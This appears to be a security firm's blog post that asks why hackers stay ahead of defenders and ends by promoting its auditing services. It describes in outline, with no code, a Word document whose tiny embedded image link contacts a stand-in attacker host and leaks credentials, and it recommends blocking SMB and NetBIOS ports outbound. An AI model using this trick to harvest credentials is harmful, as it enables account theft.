So the Defense (also known as Blue team) has been inundated with spam, the goal of the spam(for the hackers) is for an unsuspecting user to give up their credentials(username and password). Hackers are always trying to get your usernames and passwords.
Opening a word document? What if it included a small file that is unlikely or even impossible to detect when first opening the file? because it gets resized to a small point in the document.
Notice the above image shows how to create a link inside a picture.
the above image is from ISC.sans.edu link.
So due to various dirty tricks in spam we have built 2FA (Two Factor Authentication) so that the connecting to the email server and getting your email will effectively shut out the spam merchants… until now with this nifty trick. (Do you have to re-establish 2FA every time you get email? Or only when first logging in?)
When you open the word document the picture activates and tries to connect to the criminal-hacker-website.com which then sends the credentials of the computer to criminal-hacker-website.com.
Clearly only username and password defense is not going to do the job, as many tricks will pry the information to your account out of you. And an incorrectly set up 2FA also would be a problem.
The defense must have a good logging and egress filter setup. (Block port 445/tcp , 137/tcp, 139/tcp, and 137/udp and 139/udp.
Back to my question “How are Hackers Always a step ahead of the Defense?”
The answer lies in logic actually: If you have to defend 24 hours per day every day while trying to use software of the Internet then it is only a matter of time before a hacker uses ingenuity to break or bypass your defenses as shown above. We have to constantly be aware of new attacks and thus ways of defending against new vulnerabilities found every day.
True it would be nice if all software did not have security issues, but as we know security is not the highest effort while making a product. Making money is, and sometimes a security audit is not high on the priority scale.
So it is the same old story “The risk versus Security” see-saw.
The people who focus on Security might spend more in resources rather than others, so if you hear a new potential attack are you impulsively scoffing? Or saying I have to learn this attack and defend against it (thus spending resources?
if you are scoffing and wish to take on more risk by thinking the security problems might go away just by thinking they will go away. The risk on the internet these days is not that low, the ingenuity of new attacks are coming so fast that if you have not upped your ante, then one day it will be too late and the headlines will serve your epitaph.
So We believe that you should do both seek some risks while also staying secure by employing Security Auditors.
Contact Us to discuss